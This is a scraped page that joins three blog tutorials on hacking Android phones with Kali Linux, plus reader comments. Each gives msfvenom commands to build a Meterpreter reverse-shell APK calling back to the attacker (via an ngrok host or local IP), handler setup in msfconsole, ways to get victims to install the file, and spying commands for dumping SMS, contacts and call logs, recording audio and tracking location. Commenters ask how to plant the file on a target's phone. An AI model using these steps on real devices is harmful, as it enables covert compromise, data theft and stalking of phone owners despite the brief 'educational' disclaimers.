Hack with kali linux android

Hacking Android Remotely (WAN) using Kali Linux

The complete tutorial can be seen on ehacking blog here.

Usually in WAN, first you need to have a Static IP/Hostname and second you need to do Port Forwarding to allow your traffic transmission, and we all know that both are so difficult in real time as we have limited access to ports in a network.

So, what we will do in this scenario, we will setup a secure tunnel using Ngrok.

Ngrok is a tunneling reverse proxy system that establishes tunnels from public endpoint i.e. an internet to a locally running network service. This can help us to create a public HTTP/HTTPS URL for a website running locally in our machine. We don’t need to do any kind of port forwarding while using Ngrok and our network service will eventually expose to the internet with the help of TCP tunneling.

Step by Step Demo:

Step 01: Create an account on Ngrok to download

First you need to install Ngrok in your Kali machine.

Fire up Kali, and browse Ngrok to access its official website: https://ngrok.com/

You have to make an account first. Go to signup option and fill all the necessary fields.

(CAUTION: Do not use your work email or an email that has access to your private information. It is a best practice to use temporary emails while performing penetration testing. You can also use https://temp-mail.org/en/ to create your account)

After signing up, you can download ngrok installer for Linux.

Step 02: Unzip the downloaded file

Go to Download directory where your downloaded file resides.

You have to unzip this file. Use unzip command to extract the file.

Step 03: Copy the token, given to your account

After unzipping, you have to save the token that was given to your account.

Copy the token from here and paste it in your terminal. Make sure to paste the token in a same directory where you have ngrok.

You are all set to use this tool. Type in terminal:

# ./ngrok tcp [Port no:] (choose any port number on which you want to bind a connection)

The forwarding here specifies the TCP tunnel which ngrok has created. The connection has bind to localhost at port 4242. Now we need to generate a malicious payload by using msfvenom.

Step 04: Generate a payload by using msfvenom

# msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10900 R > /root/Desktop/android.apk

Step 05: Start reverse TCP handler

Set exploit as multi/handler, Lhost as localhost i.e 0.0.0.0, Lport as 4242 and run exploit.

Step 06: Download the payload on your android phone to get a meterpreter session

To download this payload on android device we will upload it on www.upload.ee, a very useful website to upload your files securely & anonymously .

Browse this link on your android phone, it will download the zip file of our payload. Unzip it and install it in your phone. (allow option to install it from third party sources)

After installing and running the app from my android phone, I got a session in my Kali attacking machine.

That is how you can actually exploit an android phone and gain access remotely over the internet rather than on your local area network. After getting a session you know that an attacker can easily get your info, steal your contacts, messages, app data and many more. So, gaining access of your phone is that much easier when you don’t have awareness.

This exploit is tested on Android version 9.0, which is not an old version and currently in use by many users. A healthy tip to secure your Android device is to not install any application from an unknown source, even if you really want to install it, try to read and examine its source code to get an idea whether this file is malicious or not.

Источник

How to Access an Android Phone using Kali Linux

An Android smartphone is often a gateway to most commercial IoT gadgets. A Nest Smoke alarm is managed through a relevant Android app. So is a Nest Thermostat to control the temperature. Smart locks, doorbell cams – almost all smart devices can be accessed from Alexa or other master apps. What if someone were to gain remote access to such an Android phone? You think this is impossible? For this, we will give a basic demo of how a Kali Linux “metasploit” can be used to create a backdoor entry to your Android phone.

Note: this tutorial is for security researchers and hobbyists. We do not recommend hacking anyone’s phone without their permission.

Background

Before you begin work on Kali Linux, you first need to familiarize yourself with its console terminal.

It readily hosts a comprehensive list of tools which are designed to target a device’s firmware or operating system.

Here, we will use one of the common tools called “MSFVenom” to insert a virus in an Android phone. It generates multiple kinds of payloads based on user selected options. The exploit works across many platforms including Windows, Android, OpenBSD, Solaris, JAVA, PHP, and gaming hardware.

Launching an Android Metasploit

The following steps will demonstrate how to download MSFVenom on a Kali Linux system.

Start the terminal and enter the following command.

Here, the payload is launched using an Exploit extension calleed “Meterpreter”.

To determine the IP address of the listener host, open a new console terminal and enter ifconfig . Usually, port 4444 is assigned for trojans, exploits, and viruses.

Once the IP address has been determined, go back to the previous screen and enter the details.

The file “hackand.apk” will be saved in the desktop and is the main backdoor exploit to be used on the Android phone.

In the next step, launch “msfconsole” which is a common penetration testing tool used with Kali Linux. For this, enter service postgresql start followed by msfconsole . PostgreSQL refers to a database where the console has been stored.

Once the penetration tool is ready, you can launch the remaining exploit.

Next, an executable called “multi-handler” will be used.

Refer to the image below for connecting the exploit with the console. The same IP address and port numbers will be used.

In the next stage, the msfvenom exploit will be launched and initialized with a simple exploit command. Now, we have to find a target which will be an Android phone.

Connecting Kali Linux Terminal with Android Phone

The hackand.apk file which we downloaded earlier is only 10 KB in size. You will have to find a way to insert the file in the target’s phone. You can transfer the virus using USB or a temporary email service.

Generally, webmail providers such as Gmail or Yahoo will refuse to carry this virus infected file.

Android will warn you before you insert the software. But, it just takes less than 20 seconds to complete the installation as you only have to “ignore the risk and install.” This makes the threat somewhat serious if your phone is in unlock mode.

As shown here, a lot of damage can be done to the phone including modifying the storage contents, preventing phone from sleep, connecting and disconnecting from Wi-Fi, setting wallpaper, and more.

Once the APK file is installed, it can be cleverly disguised within the phone.

Now, you can use many commands like the following on Kali Linux terminal to control the phone. You don’t have to remember them really as the list is available from a simple help option in meterpreter .

• record_mic : recording the microphone
• dump calllog : get the call log
• webcam_chat : start a video chat
• geolocate : get the phone’s current location

Most advanced Android phones will prevent this malicious app from getting installed. So, this exploit will generally work with older Android models.

Also read: 10 Best Hacking Apps for Android

Thoughts

In this tutorial, we saw a basic strategy of using Kali Linux to gain access to an Android smartphone. Even though this is a very simple exploit, it has great implications in terms of IoT security.

What do you think of Kali Linux exploits? Will you be more cautious about your phone’s security? Do let us know in the comments.

Sayak Boral is a technology writer with over ten years of experience working in different industries including semiconductors, IoT, enterprise IT, telecommunications OSS/BSS, and network security. He has been writing for MakeTechEasier on a wide range of technical topics including Windows, Android, Internet, Hardware Guides, Browsers, Software Tools, and Product Reviews.

8 comments

It gets stuck on [*] started reverse TCP handler

The KL terminal is waiting to detect any target device that will open the payload. Remember this is a penetration test so if the exploit fails to penetrate the phone, it means your Android phone was patched so this specific exploit may not work because your phone doesn’t let a suspicious network listen to. Only if the penetration was successful, a Meterpreter session will start. Your phone has to be connected to same Wi-Fi as the KL terminal PC. A penetration attempt, by definition, is not always successful so you must keep trying it with other exploits and tools which you can find on https://tools.kali.org/. One way (method not covered in this article) is to use a port forwarding service on your KL terminal like Ngrok. But have noted this issue, and we will try to bring a new article which deals with solutions to common stalled penetration attempts.

perfect… but it doesn’t clear for me about how to insert that file to target phone. Is their clear way…

See the last section. It’s a penetration test so the objective is to test a phone’s vulnerability to a potential. The only way this test will work is to find an unlocked phone where the payload file (hackand.apk) is inserted manually or by using a temporary email service. It should take around 3-5 minutes to insert the file.

how can we send the file via a temporary email service

it dosn’t work for me when the trojan is insert its automaticly closed after 30 seconds (session died) do you have a solution for that ?and thanks for all …

Источник

How To Hack Android Phones Using Kali Linux 2019

H acking of Android phone sounds like very odd, but here our expert trainers give you the best tutorials to hack android phone using Kali Linux. Android phones have a significant share in smartphone market. So targeting Android phone is very good option to hack them quickly. In this complete tutorial on Android hacking, i’ll show you merits and de-merits of Android hacking. So let’s start Hack Android Phones Using Kali Linux.

How To Hack Android Phones Using Kali Linux 2019

Before going to learn how to hack android. I must want to tell about Kali Linux through which these hacks works.

Warning:- This Hack is to aware you, and learn this only for Educational Purpose. and Don’t try to do any illegal activity.

About Kali Linux?

Kali Linux is a “Debian-derived Linux distribution designed for digital forensics and penetration testing.” There are lots of functions in Kali Linux like Penetration Testing and Ethical Hacking Linux Distribution etc.

Requirement:

1. Kali Linux installed.
2. An Android phone.
3. Sharp Brain

Note: In This tutorial here i’m using Acer Laptop as Attacker PC in which Kali linux is installed, and Coolpad Note 3 Android phone as Victim’s Android phone to show you how this actually works.

Steps: How To Hack Android Phones Using Kali Linux.

#1.Open Kali terminal on your PC.

#2.We will be going to use “MSFVENOM” to create a malicious apk file that we will install on the android phone.

#3.Paste these given commands in terminal.

msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.27.207 R > root/itechhacks.apk

#4. Change the “LHOST” to you local IP address and press enter.

#5. Now open the root folder and send the techhacks.apk to the victim. (As shown in pictures)

#6. Open a new terminal and enter “msfconsole.”

#7. After opening Metasploit console type these following commands which are used to create payload handler which will create a connection between the victim and Kali PC.

use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 172.16.27.207 exploit

#8. Change the LHOST to your local IP address. Also, don’t close this terminal.

#9. Wait until victim opens the file.

#10. After the victim opens the file, you will get a interpreter session. Now open the MSF console terminal and use session -i 1command to access the session.

#11. In the meterpreter session, you can use various commands that are given below to play different types of tricks on the victim phone like capturing a photo, screenshot, call logs,SMS logs, sending an SMS.

Command Description
——- ———–
activity_start Start an Android activity from a Uri string
check_root Check if device is rooted
dump_calllog Get call log
dump_contacts Get contacts list
dump_sms Get sms messages
geolocate Get current lat-long using geolocation
interval_collect Manage interval collection capabilities
send_sms Sends SMS from target session
set_audio_mode Set Ringer Mode
sqlite_query Query a SQLite database from storage
wlan_geolocate Get current lat-long using WLAN information

Note:

*. Don’t close the msfconsole terminal.
*. This is only for educational purpose.

Источник